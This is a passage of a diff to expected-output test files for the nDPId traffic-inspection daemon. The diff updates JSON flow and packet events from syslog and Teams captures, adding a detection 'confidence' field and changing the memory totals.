 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1600782515213,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"ts_msec":1600782515213,"pkt":"qrvMkvyHqrvMTZFeCABFAADsAAoAAP8RSX3AqC2iCtB4X99OAgIA2PlAPDE4OT45MzogUjE6IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+TElORVBST1RPPC9mYWNpbGl0eT48c2V2ZXJpdHk+NTwvc2V2ZXJpdHk+PG1zZy1pZD5VUERPV048L21zZy1pZD48dGltZT4qU2VwIDIyIDEzOjQ4OjM0LjIwMDwvdGltZT48YXJncz48YXJnIGlkPSIwIj5Mb29wYmFjazE8L2FyZz48YXJnIGlkPSIxIj51cDwvYXJnPjwvYXJncz48L2lvcy1sb2ctbXNnPg=="}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1600782411853,"flow_last_seen":1600782438439,"flow_idle_time":180000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":989,"flow_avg_l4_payload_len":247,"midstream":0,"ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
-00652{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
-00654{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600782514222,"flow_last_seen":1600782515213,"flow_idle_time":180000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1600782411853,"flow_last_seen":1600782438439,"flow_idle_time":180000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":989,"flow_avg_l4_payload_len":247,"midstream":0,"ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00678{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00680{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600782514222,"flow_last_seen":1600782515213,"flow_idle_time":180000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782647886,"flow_last_seen":1600782647886,"flow_idle_time":180000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1600782647886,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"ts_msec":1600782647886,"pkt":"qrvMj6IeqrvMSxtwCABFAADnAAsAAP8R5RQK4CuVrBfzWd9OAgIA0\/DmPDE4OT45NDogPGlvcy1sb2ctbXNnPjxmYWNpbGl0eT5TWVM8L2ZhY2lsaXR5PjxzZXZlcml0eT41PC9zZXZlcml0eT48bXNnLWlkPkNPTkZJR19JPC9tc2ctaWQ+PHRpbWU+KlNlcCAyMiAxMzo1MDo0Ni43Nzc8L3RpbWU+PGFyZ3M+PGFyZyBpZD0iMCI+Y29uc29sZTwvYXJnPjxhcmcgaWQ9IjEiPmNvbnNvbGU8L2FyZz48L2FyZ3M+PC9pb3MtbG9nLW1zZz4="}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782647886,"flow_last_seen":1600782647886,"flow_idle_time":180000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782647886,"flow_last_seen":1600782647886,"flow_idle_time":180000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1600782652384,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"ts_msec":1600782652384,"pkt":"qrvMj6IeqrvMSxtwCABFAADoAAwAAP8R5RIK4CuVrBfzWd9OAgIA1N5pPDE4OT45NTogPGlvcy1sb2ctbXNnPjxmYWNpbGl0eT5MSU5FUFJPVE88L2ZhY2lsaXR5PjxzZXZlcml0eT41PC9zZXZlcml0eT48bXNnLWlkPlVQRE9XTjwvbXNnLWlkPjx0aW1lPipTZXAgMjIgMTM6NTA6NTEuNzUyPC90aW1lPjxhcmdzPjxhcmcgaWQ9IjAiPkxvb3BiYWNrMjwvYXJnPjxhcmcgaWQ9IjEiPnVwPC9hcmc+PC9hcmdzPjwvaW9zLWxvZy1tc2c+"}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1600782653380,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"ts_msec":1600782653380,"pkt":"qrvMj6IeqrvMSxtwCABFAADnAA0AAP8R5RIK4CuVrBfzWd9OAgIA0\/vrPDE4OT45NjogPGlvcy1sb2ctbXNnPjxmYWNpbGl0eT5TWVM8L2ZhY2lsaXR5PjxzZXZlcml0eT41PC9zZXZlcml0eT48bXNnLWlkPkNPTkZJR19JPC9tc2ctaWQ+PHRpbWU+KlNlcCAyMiAxMzo1MDo1Mi4zMTI8L3RpbWU+PGFyZ3M+PGFyZyBpZD0iMCI+Y29uc29sZTwvYXJnPjxhcmcgaWQ9IjEiPmNvbnNvbGU8L2FyZz48L2FyZ3M+PC9pb3MtbG9nLW1zZz4="}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1600782647886,"flow_last_seen":1600782653380,"flow_idle_time":180000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":610,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600782514222,"flow_last_seen":1600782515213,"flow_idle_time":180000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1600782647886,"flow_last_seen":1600782653380,"flow_idle_time":180000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":610,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600782514222,"flow_last_seen":1600782515213,"flow_idle_time":180000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"syslog.pcapng","alias":"nDPId-test","total-events-serialized":43}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -49,9 +49,9 @@
 ~~ total active/idle flows...: 7/7
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4602609 bytes
-~~ total memory freed........: 4602609 bytes
-~~ total allocations/frees...: 99591/99591
+~~ total memory allocated....: 4685594 bytes
+~~ total memory freed........: 4685594 bytes
+~~ total allocations/frees...: 101181/101181
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
 ~~ json string max len.......: 841 chars
diff --git a/test/results/teams.pcap.out b/test/results/teams.pcap.out
index e9eda8187..6dec4298d 100644
--- a/test/results/teams.pcap.out
+++ b/test/results/teams.pcap.out
@@ -1,7 +1,7 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"teams.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1587041672419,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"ts_msec":1587041672419,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES1AAEARZ+TAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABgr52AAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}}
+00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}}
 00351{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041672611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00162{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041673094,"flow_last_seen":1587041673094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1587041673094,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -19,9 +19,9 @@
 00162{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":9,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1587041675997,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1587041675997,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPKfkAAP8RDk3AqAEGwKgBAe2NADUAO4czzp0BAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQAB"}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1587041676010,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"ts_msec":1587041676010,"pkt":"KDc3AG3IEBMx8Tl2CABFAABfTWlAADkRcM3AqAEBwKgBBgA17Y0ASwAAzp2BgAABAAEAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQABwAwAAQABAAAACQAENHJNIQ=="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041676010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.33"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041676010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.33"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676362,"flow_last_seen":1587041676362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041676362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1587041676362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041676362,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex0AbuczSMnAAAAALAC\/\/99oQAAAgQFtAEDAwUBAQgKMISXcQAAAAAEAgAA"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1587041676405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041676405,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8L\/5AAGwGm3w0ck0hwKgBBgG77HRJoiConM0jKKASIABWrQAAAgQFoAEDAwgEAggKYQZMqDCEl3E="}
@@ -30,29 +30,29 @@
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1587041676435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041676435,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx1AbsuhcJCAAAAALAC\/\/\/XIQAAAgQFtAEDAwUBAQgKMISXugAAAAAEAgAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1587041676448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041676448,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0CixAAHUGQvQ0ccKEwKgBBgG77HWQGjC4LoXCQ4AS\/\/8WpAAAAgQFoAEDAwgBAQQC"}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1587041676448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041676448,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx1AbsuhcJDkBowuVAQIAA3YwAA"}
